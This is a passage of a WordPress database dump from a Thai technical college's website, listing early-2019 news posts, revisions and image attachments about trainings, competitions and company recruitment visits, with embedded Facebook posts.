(5138, 3, '2019-01-31 11:29:12', '2019-01-31 04:29:12', '', '51226429_753194448390079_1754589548819513344_o', '', 'inherit', 'closed', 'closed', '', '51226429_753194448390079_1754589548819513344_o', '', '', '2019-01-31 11:29:12', '2019-01-31 04:29:12', '', 5137, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/51226429_753194448390079_1754589548819513344_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(5139, 3, '2019-01-31 11:29:34', '2019-01-31 04:29:34', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D753195305056660%26id%3D100010985913485&width=500\" width=\"500\" height=\"688\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพฤหัสบดีที่ ๓๑ มกราคม ๒๕๖๒ นักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง เข้าร่วมอบรมเกี่ยวกับการใช้รถใช้ถนนอย่างถูกต้อง ภายใต้โครงการนักเรียนรุ่นใหม่มีใบขับขี่ ณ ห้องประชุมสัมมนาอาชีวศึกษา อาคารอำนวยการ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '5137-revision-v1', '', '', '2019-01-31 11:29:34', '2019-01-31 04:29:34', '', 5137, 'http://www.technicrayong.ac.th/5137-revision-v1/', 0, 'revision', '', 0),
(5141, 3, '2019-02-04 09:51:37', '2019-02-04 02:51:37', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.754525941590263&type=3\"><img class=\"aligncenter wp-image-5149 size-full\" src=\"/wp-content/uploads/2019/02/4-2-2562-10-14-27.png\" alt=\"\" width=\"503\" height=\"692\" /></a>', 'วันเสาร์ที่ ๒ กุมภาพันธ์ ๒๕๖๒ ศูนย์ประสานงานการผลิตและพัฒนากำลังคนอาชีวศึกษา เขตพัฒนาพิเศษภาคตะวันออก ศูนย์หลัก วิทยาลัยเทคนิคระยอง จัดประชุมเชิงปฏิบัติการวิเคราะห์ข้อมูลกำลังคนอาชีวศึกษา Big Data System เพื่อวางแผนการจัดการเรียนการสอนและพัฒนาหลักสูตรอาชีวศึกษา โดยท่าน พลเอกสุรเชษฐ์ ชัยวงศ์ รัฐมนตรีช่วยว่าการกระทรวงศึกษาธิการ เป็นประธานในพิธีเปิด ณ โรงแรมโกลเด้น ซิตี้ ระยอง จังหวัดระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9d%e0%b8%b6%e0%b8%81%e0%b8%ad%e0%b8%9a%e0%b8%a3%e0%b8%a1%e0%b9%80%e0%b8%9e%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%81%e0%b8%82%e0%b9%88%e0%b8%87', '', '', '2019-02-04 10:39:49', '2019-02-04 03:39:49', '', 0, 'http://www.technicrayong.ac.th/?p=5141', 144, 'post', '', 0),
(5142, 3, '2019-02-04 09:46:31', '2019-02-04 02:46:31', '', '51137483_754393864936804_6798503994831405056_o', '', 'inherit', 'closed', 'closed', '', '51137483_754393864936804_6798503994831405056_o', '', '', '2019-02-04 09:46:31', '2019-02-04 02:46:31', '', 5141, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/02/51137483_754393864936804_6798503994831405056_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(5143, 3, '2019-02-04 09:51:37', '2019-02-04 02:51:37', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D754396851603172%26id%3D100010985913485&width=500\" width=\"500\" height=\"743\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'การฝึกอบรมเพื่อการแข่งขันหุ่นยนต์ระบบอัตโนมัติ Automation System Robot ภายใต้โครงการส่งเสริมการวิจัยและพัฒนาคุณภาพนวัตกรรมเทคโนโลยีหุ่นยนต์อาชีวศึกษาปีการศึกษา ๒๕๖๑ ระหว่างวันที่ ๑-๕ กุมภาพันธ์ ๒๕๖๒ ณ สำนักพัฒนาสมรรถนะครูและบุคลากรอาชีวศึกษา กรุงเทพมหานคร', '', 'inherit', 'closed', 'closed', '', '5141-revision-v1', '', '', '2019-02-04 09:51:37', '2019-02-04 02:51:37', '', 5141, 'http://www.technicrayong.ac.th/5141-revision-v1/', 0, 'revision', '', 0),
(5144, 3, '2019-02-04 09:53:46', '2019-02-04 02:53:46', '', 'คู่มือการรับสมัคร นักเรียน 2562', '', 'inherit', 'closed', 'closed', '', '%e0%b8%84%e0%b8%b9%e0%b9%88%e0%b8%a1%e0%b8%b7%e0%b8%ad%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3-%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3', '', '', '2019-02-04 09:53:46', '2019-02-04 02:53:46', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/คู่มือการรับสมัคร-นักเรียน-2562.pdf', 0, 'attachment', 'application/pdf', 0),
(5147, 3, '2019-02-04 10:48:47', '2019-02-04 03:48:47', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D755031804873010%26id%3D100010985913485&width=500\" width=\"500\" height=\"764\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอาทิตย์ที่ ๓ กุมภาพันธ์ ๒๕๖๒ พิธีเปิดการฝึกอบรมเพื่อการแข่งขันหุ่นยนต์ระบบอัตโนมัติ Automation System Robot ภายใต้โครงการส่งเสริมการวิจัยและพัฒนาคุณภาพนวัตกรรมเทคโนโลยีหุ่นยนต์อาชีวศึกษา ปีการศึกษา ๒๕๖๑ โดยท่านชัยมงคล เสนาสุ ผู้อำนวยการสำนักวิจัยและพัฒนาการอาชีวศึกษา มาเป็นประธานในพิธีเปิด และ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง เป็นผู้กล่าวรายงานฯ ในครั้งนี้ ณ สำนักพัฒนาสมรรถนะครูและบุคลากรอาชีวศึกษา กรุงเทพมหานคร', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%ad%e0%b8%b2%e0%b8%97%e0%b8%b4%e0%b8%95%e0%b8%a2%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%93-%e0%b8%81%e0%b8%b8%e0%b8%a1%e0%b8%a0%e0%b8%b2%e0%b8%9e%e0%b8%b1%e0%b8%99', '', '', '2019-02-04 10:48:47', '2019-02-04 03:48:47', '', 0, 'http://www.technicrayong.ac.th/?p=5147', 143, 'post', '', 0),
(5148, 3, '2019-02-04 10:20:26', '2019-02-04 03:20:26', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.754525941590263&type=3\"><img class=\"aligncenter wp-image-5149 size-full\" src=\"/wp-content/uploads/2019/02/4-2-2562-10-14-27.png\" alt=\"\" width=\"503\" height=\"692\" /></a>', 'วันเสาร์ที่ ๒ กุมภาพันธ์ ๒๕๖๒ ศูนย์ประสานงานการผลิตและพัฒนากำลังคนอาชีวศึกษา เขตพัฒนาพิเศษภาคตะวันออก ศูนย์หลัก วิทยาลัยเทคนิคระยอง จัดประชุมเชิงปฏิบัติการวิเคราะห์ข้อมูลกำลังคนอาชีวศึกษา Big Data System เพื่อวางแผนการจัดการเรียนการสอนและพัฒนาหลักสูตรอาชีวศึกษา โดยท่าน พลเอกสุรเชษฐ์ ชัยวงศ์ รัฐมนตรีช่วยว่าการกระทรวงศึกษาธิการ เป็นประธานในพิธีเปิด ณ โรงแรมโกลเด้น ซิตี้ ระยอง จังหวัดระยอง', '', 'inherit', 'closed', 'closed', '', '5141-autosave-v1', '', '', '2019-02-04 10:20:26', '2019-02-04 03:20:26', '', 5141, 'http://www.technicrayong.ac.th/5141-autosave-v1/', 0, 'revision', '', 0),
(5149, 3, '2019-02-04 10:15:10', '2019-02-04 03:15:10', '', '4-2-2562 10-14-27', '', 'inherit', 'closed', 'closed', '', '4-2-2562-10-14-27', '', '', '2019-02-04 10:15:10', '2019-02-04 03:15:10', '', 5141, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/02/4-2-2562-10-14-27.png', 0, 'attachment', 'image/png', 0),
(5150, 3, '2019-02-04 10:38:34', '2019-02-04 03:38:34', '', '51286822_754485364927654_6403831555852075008_o', '', 'inherit', 'closed', 'closed', '', '51286822_754485364927654_6403831555852075008_o', '', '', '2019-02-04 10:38:34', '2019-02-04 03:38:34', '', 5141, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/02/51286822_754485364927654_6403831555852075008_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(5151, 3, '2019-02-04 10:39:14', '2019-02-04 03:39:14', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.754525941590263&type=3\"><img class=\"aligncenter wp-image-5149 size-full\" src=\"/wp-content/uploads/2019/02/4-2-2562-10-14-27.png\" alt=\"\" width=\"503\" height=\"692\" /></a>', 'วันเสาร์ที่ ๒ กุมภาพันธ์ ๒๕๖๒ ศูนย์ประสานงานการผลิตและพัฒนากำลังคนอาชีวศึกษา เขตพัฒนาพิเศษภาคตะวันออก ศูนย์หลัก วิทยาลัยเทคนิคระยอง จัดประชุมเชิงปฏิบัติการวิเคราะห์ข้อมูลกำลังคนอาชีวศึกษา Big Data System เพื่อวางแผนการจัดการเรียนการสอนและพัฒนาหลักสูตรอาชีวศึกษา โดยท่าน พลเอกสุรเชษฐ์ ชัยวงศ์ รัฐมนตรีช่วยว่าการกระทรวงศึกษาธิการ เป็นประธานในพิธีเปิด ณ โรงแรมโกลเด้น ซิตี้ ระยอง จังหวัดระยอง', '', 'inherit', 'closed', 'closed', '', '5141-revision-v1', '', '', '2019-02-04 10:39:14', '2019-02-04 03:39:14', '', 5141, 'http://www.technicrayong.ac.th/5141-revision-v1/', 0, 'revision', '', 0),
(5152, 3, '2019-02-04 10:48:26', '2019-02-04 03:48:26', '', '51165026_755029704873220_860044978863210496_o', '', 'inherit', 'closed', 'closed', '', '51165026_755029704873220_860044978863210496_o', '', '', '2019-02-04 10:48:26', '2019-02-04 03:48:26', '', 5147, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/02/51165026_755029704873220_860044978863210496_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(5153, 3, '2019-02-04 10:48:47', '2019-02-04 03:48:47', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D755031804873010%26id%3D100010985913485&width=500\" width=\"500\" height=\"764\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอาทิตย์ที่ ๓ กุมภาพันธ์ ๒๕๖๒ พิธีเปิดการฝึกอบรมเพื่อการแข่งขันหุ่นยนต์ระบบอัตโนมัติ Automation System Robot ภายใต้โครงการส่งเสริมการวิจัยและพัฒนาคุณภาพนวัตกรรมเทคโนโลยีหุ่นยนต์อาชีวศึกษา ปีการศึกษา ๒๕๖๑ โดยท่านชัยมงคล เสนาสุ ผู้อำนวยการสำนักวิจัยและพัฒนาการอาชีวศึกษา มาเป็นประธานในพิธีเปิด และ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง เป็นผู้กล่าวรายงานฯ ในครั้งนี้ ณ สำนักพัฒนาสมรรถนะครูและบุคลากรอาชีวศึกษา กรุงเทพมหานคร', '', 'inherit', 'closed', 'closed', '', '5147-revision-v1', '', '', '2019-02-04 10:48:47', '2019-02-04 03:48:47', '', 5147, 'http://www.technicrayong.ac.th/5147-revision-v1/', 0, 'revision', '', 0),
(5154, 3, '2019-02-04 10:53:14', '2019-02-04 03:53:14', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D755031804873010%26id%3D100010985913485&width=500\" width=\"500\" height=\"764\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอาทิตย์ที่ ๓ กุมภาพันธ์ ๒๕๖๒ พิธีเปิดการฝึกอบรมเพื่อการแข่งขันหุ่นยนต์ระบบอัตโนมัติ Automation System Robot ภายใต้โครงการส่งเสริมการวิจัยและพัฒนาคุณภาพนวัตกรรมเทคโนโลยีหุ่นยนต์อาชีวศึกษา ปีการศึกษา ๒๕๖๑ โดยท่านชัยมงคล เสนาสุ ผู้อำนวยการสำนักวิจัยและพัฒนาการอาชีวศึกษา มาเป็นประธานในพิธีเปิด และ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง เป็นผู้กล่าวรายงานฯ ในครั้งนี้ ณ สำนักพัฒนาสมรรถนะครูและบุคลากรอาชีวศึกษา กรุงเทพมหานคร', '', 'inherit', 'closed', 'closed', '', '5147-autosave-v1', '', '', '2019-02-04 10:53:14', '2019-02-04 03:53:14', '', 5147, 'http://www.technicrayong.ac.th/5147-autosave-v1/', 0, 'revision', '', 0),
(5156, 3, '2019-02-11 09:52:52', '2019-02-11 02:52:52', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fniramol.raksawong%2Fposts%2F2165938636759662&width=500\" width=\"500\" height=\"688\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพุธที่ ๖ กุมภาพันธ์ ๒๕๖๒ บริษัท โคเวสโตร (ประเทศไทย) จำกัด จัดกิจกรรมแนะนำบริษัท แนะนำเทคนิคการสัมภาษณ์งาน การเขียน Resume และรับสมัครงาน ณ ห้องประชุมชั้น ๓ อาคารอำนวยการ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%9e%e0%b8%b8%e0%b8%98%e0%b8%97%e0%b8%b5%e0%b9%88%e2%80%8b-%e0%b9%96%e2%80%8b-%e0%b8%81%e0%b8%b8%e0%b8%a1%e0%b8%a0%e0%b8%b2%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c', '', '', '2019-02-11 09:52:52', '2019-02-11 02:52:52', '', 0, 'http://www.technicrayong.ac.th/?p=5156', 142, 'post', '', 0),
(5157, 3, '2019-02-11 09:52:34', '2019-02-11 02:52:34', '', '51641754_2165937120093147_2374474443415093248_n', '', 'inherit', 'closed', 'closed', '', '51641754_2165937120093147_2374474443415093248_n', '', '', '2019-02-11 09:52:34', '2019-02-11 02:52:34', '', 5156, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/02/51641754_2165937120093147_2374474443415093248_n.jpg', 0, 'attachment', 'image/jpeg', 0),
(5158, 3, '2019-02-11 09:52:52', '2019-02-11 02:52:52', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fniramol.raksawong%2Fposts%2F2165938636759662&width=500\" width=\"500\" height=\"688\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพุธที่ ๖ กุมภาพันธ์ ๒๕๖๒ บริษัท โคเวสโตร (ประเทศไทย) จำกัด จัดกิจกรรมแนะนำบริษัท แนะนำเทคนิคการสัมภาษณ์งาน การเขียน Resume และรับสมัครงาน ณ ห้องประชุมชั้น ๓ อาคารอำนวยการ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '5156-revision-v1', '', '', '2019-02-11 09:52:52', '2019-02-11 02:52:52', '', 5156, 'http://www.technicrayong.ac.th/5156-revision-v1/', 0, 'revision', '', 0),
(5159, 3, '2019-02-11 13:43:23', '2019-02-11 06:43:23', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fniramol.raksawong%2Fposts%2F2173051369381722&width=500\" width=\"500\" height=\"783\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันจันทร์ที่ ๑๑ กุมภาพันธ์ ๒๕๖๒ บริษัท คราวน์อิมิเรตส์ จำกัด ผู้ผลิตบรรจุภัณฑ์เครื่องดื่มในเครือประเทศสหรัฐอเมริกา จัดกิจกรรมประชาสัมพันธ์บริษัทฯ เพื่อแนะนำโอกาสให้กับนักเรียน นักศึกษาที่สนใจทำงานกับบริษัทที่เมืองดูไบ ประเทศสหรัฐอาหรับอิมิเรตส์ โดยบริษัทได้จัดสอบข้อเขียน และสอบสัมภาษณ์ให้กับนักเรียน นักศึกษาที่สนใจ ณ ห้อง Smart ClassRoom วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%88%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88%e2%80%8b-%e0%b9%91%e0%b9%91-%e0%b8%81%e0%b8%b8%e0%b8%a1%e0%b8%a0%e0%b8%b2%e0%b8%9e%e0%b8%b1', '', '', '2019-02-11 13:43:23', '2019-02-11 06:43:23', '', 0, 'http://www.technicrayong.ac.th/?p=5159', 141, 'post', '', 0),
(5160, 3, '2019-02-11 13:43:10', '2019-02-11 06:43:10', '', '52594315_2173047412715451_2219177265034428416_n', '', 'inherit', 'closed', 'closed', '', '52594315_2173047412715451_2219177265034428416_n', '', '', '2019-02-11 13:43:10', '2019-02-11 06:43:10', '', 5159, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/02/52594315_2173047412715451_2219177265034428416_n.jpg', 0, 'attachment', 'image/jpeg', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(5161, 3, '2019-02-11 13:43:23', '2019-02-11 06:43:23', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fniramol.raksawong%2Fposts%2F2173051369381722&width=500\" width=\"500\" height=\"783\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันจันทร์ที่ ๑๑ กุมภาพันธ์ ๒๕๖๒ บริษัท คราวน์อิมิเรตส์ จำกัด ผู้ผลิตบรรจุภัณฑ์เครื่องดื่มในเครือประเทศสหรัฐอเมริกา จัดกิจกรรมประชาสัมพันธ์บริษัทฯ เพื่อแนะนำโอกาสให้กับนักเรียน นักศึกษาที่สนใจทำงานกับบริษัทที่เมืองดูไบ ประเทศสหรัฐอาหรับอิมิเรตส์ โดยบริษัทได้จัดสอบข้อเขียน และสอบสัมภาษณ์ให้กับนักเรียน นักศึกษาที่สนใจ ณ ห้อง Smart ClassRoom วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '5159-revision-v1', '', '', '2019-02-11 13:43:23', '2019-02-11 06:43:23', '', 5159, 'http://www.technicrayong.ac.th/5159-revision-v1/', 0, 'revision', '', 0),
(5162, 3, '2019-02-12 13:06:49', '2019-02-12 06:06:49', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.760636277645896&type=3\"><img class=\"aligncenter size-full wp-image-5163\" src=\"/wp-content/uploads/2019/02/12-2-2562-13-04-28.png\" alt=\"\" width=\"516\" height=\"676\" /></a>', 'สุดยอดนวัตกรรมอาชีวศึกษา การประกวดสิ่งประดิษฐ์ของคนรุ่นใหม่ และการแข่งขันหุ่นยนต์อาชีวศึกษา ระดับชาติ ประจำปีการศึกษา ๒๕๖๑ สำนักงานคณะกรรมการการอาชีวศึกษา กระทรวงศึกษาธิการ วันที่ ๗-๑๐ กุมภาพันธ์ ๒๕๖๒ ณ ห้องไดมอนด์ฮอลล์ ศูนย์การค้าเซียร์รังสิต อำเภอลำลูกกา จังหวัดปทุมธานี', '', 'publish', 'closed', 'open', '', '%e0%b8%aa%e0%b8%b8%e0%b8%94%e0%b8%a2%e0%b8%ad%e0%b8%94%e0%b8%99%e0%b8%a7%e0%b8%b1%e0%b8%95%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%ad%e0%b8%b2%e0%b8%8a%e0%b8%b5%e0%b8%a7%e0%b8%a8%e0%b8%b6%e0%b8%81-2', '', '', '2019-02-12 13:06:49', '2019-02-12 06:06:49', '', 0, 'http://www.technicrayong.ac.th/?p=5162', 140, 'post', '', 0),
(5163, 3, '2019-02-12 13:04:55', '2019-02-12 06:04:55', '', '12-2-2562 13-04-28', '', 'inherit', 'closed', 'closed', '', '12-2-2562-13-04-28', '', '', '2019-02-12 13:04:55', '2019-02-12 06:04:55', '', 5162, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/02/12-2-2562-13-04-28.png', 0, 'attachment', 'image/png', 0),
(5164, 3, '2019-02-12 13:06:32', '2019-02-12 06:06:32', '', '51933250_760654664310724_5727922781429956608_o', '', 'inherit', 'closed', 'closed', '', '51933250_760654664310724_5727922781429956608_o', '', '', '2019-02-12 13:06:32', '2019-02-12 06:06:32', '', 5162, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/02/51933250_760654664310724_5727922781429956608_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(5165, 3, '2019-02-12 13:06:49', '2019-02-12 06:06:49', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.760636277645896&type=3\"><img class=\"aligncenter size-full wp-image-5163\" src=\"/wp-content/uploads/2019/02/12-2-2562-13-04-28.png\" alt=\"\" width=\"516\" height=\"676\" /></a>', 'สุดยอดนวัตกรรมอาชีวศึกษา การประกวดสิ่งประดิษฐ์ของคนรุ่นใหม่ และการแข่งขันหุ่นยนต์อาชีวศึกษา ระดับชาติ ประจำปีการศึกษา ๒๕๖๑ สำนักงานคณะกรรมการการอาชีวศึกษา กระทรวงศึกษาธิการ วันที่ ๗-๑๐ กุมภาพันธ์ ๒๕๖๒ ณ ห้องไดมอนด์ฮอลล์ ศูนย์การค้าเซียร์รังสิต อำเภอลำลูกกา จังหวัดปทุมธานี', '', 'inherit', 'closed', 'closed', '', '5162-revision-v1', '', '', '2019-02-12 13:06:49', '2019-02-12 06:06:49', '', 5162, 'http://www.technicrayong.ac.th/5162-revision-v1/', 0, 'revision', '', 0),
(5166, 3, '2019-02-12 13:12:44', '2019-02-12 06:12:44', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D760674070975450%26id%3D100010985913485&width=500\" width=\"500\" height=\"745\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันเสาร์ที่ ๙ กุมภาพันธ์ ๒๕๖๒ นายธนวันต์ ค่ำชู และนางสาวมิ้นทิรา แทนชัยภูมิ นักศึกษาแผนกวิชาคหกรรมศาสตร์ เข้าร่วมการแข่งขันการจัดดอกไม้ชิงแชมป์ประเทศไทย ครั้งที่ ๑๓ และชิงถ้วยพระราชทาน สมเด็จพระเทพรัตนราชสุดาฯ สยามบรมราชกุมารี ได้รับรางวัลชนะเลิศ และรางวัลขวัญใจ Oasis ประเภทนักศึกษา โดยมี นางสาวชญานิษฐ์ คันธวัลย์ และนายกีรติ ศักดิ์บรูณกุลชัย เป็นครูผู้ควบคุม ณ จังหวัดชลบุรี', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b9%80%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%99-%e0%b8%81%e0%b8%b8%e0%b8%a1%e0%b8%a0%e0%b8%b2%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c', '', '', '2019-02-12 13:12:44', '2019-02-12 06:12:44', '', 0, 'http://www.technicrayong.ac.th/?p=5166', 139, 'post', '', 0),
(5167, 3, '2019-02-12 13:12:30', '2019-02-12 06:12:30', '', '52075994_760673217642202_3105356557253083136_o', '', 'inherit', 'closed', 'closed', '', '52075994_760673217642202_3105356557253083136_o', '', '', '2019-02-12 13:12:30', '2019-02-12 06:12:30', '', 5166, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/02/52075994_760673217642202_3105356557253083136_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(5168, 3, '2019-02-12 13:12:44', '2019-02-12 06:12:44', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D760674070975450%26id%3D100010985913485&width=500\" width=\"500\" height=\"745\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันเสาร์ที่ ๙ กุมภาพันธ์ ๒๕๖๒ นายธนวันต์ ค่ำชู และนางสาวมิ้นทิรา แทนชัยภูมิ นักศึกษาแผนกวิชาคหกรรมศาสตร์ เข้าร่วมการแข่งขันการจัดดอกไม้ชิงแชมป์ประเทศไทย ครั้งที่ ๑๓ และชิงถ้วยพระราชทาน สมเด็จพระเทพรัตนราชสุดาฯ สยามบรมราชกุมารี ได้รับรางวัลชนะเลิศ และรางวัลขวัญใจ Oasis ประเภทนักศึกษา โดยมี นางสาวชญานิษฐ์ คันธวัลย์ และนายกีรติ ศักดิ์บรูณกุลชัย เป็นครูผู้ควบคุม ณ จังหวัดชลบุรี', '', 'inherit', 'closed', 'closed', '', '5166-revision-v1', '', '', '2019-02-12 13:12:44', '2019-02-12 06:12:44', '', 5166, 'http://www.technicrayong.ac.th/5166-revision-v1/', 0, 'revision', '', 0),
(5169, 3, '2019-02-12 13:22:01', '2019-02-12 06:22:01', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D760693790973478%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'สถาบันการอาชีวศึกษาภาคตะวันออก ร่วมมือกับ สถาบันสหกิจศึกษาและพัฒนาสื่ออิเล็กทรอนิกส์ ไทย-เยอรมัน มหาวิทยาลัยเทคโนโลยีพระจอมเกล้าพระนครเหนือ จัดโครงการพัฒนาศักยภาพผู้ประกอบการด้านการออกแบบและการผลิตชิ้นส่วนยางยนต์ ชิ้นส่วนอากาศยานด้วยเทคโนโลยีขั้นสูงในเขตพัฒนาพิเศษภาคตะวันออก ระหว่างวันที่ ๑๒-๑๕ กุมภาพันธ์ ๒๕๖๒ ณ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%aa%e0%b8%96%e0%b8%b2%e0%b8%9a%e0%b8%b1%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%ad%e0%b8%b2%e0%b8%8a%e0%b8%b5%e0%b8%a7%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2%e0%b8%a0%e0%b8%b2%e0%b8%84-3', '', '', '2019-02-12 13:22:01', '2019-02-12 06:22:01', '', 0, 'http://www.technicrayong.ac.th/?p=5169', 138, 'post', '', 0),
(5170, 3, '2019-02-12 13:20:41', '2019-02-12 06:20:41', '', '52562680_760692620973595_5197864679698857984_o', '', 'inherit', 'closed', 'closed', '', '52562680_760692620973595_5197864679698857984_o', '', '', '2019-02-12 13:20:41', '2019-02-12 06:20:41', '', 5169, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/02/52562680_760692620973595_5197864679698857984_o.jpg', 0, 'attachment', 'image/jpeg', 0),
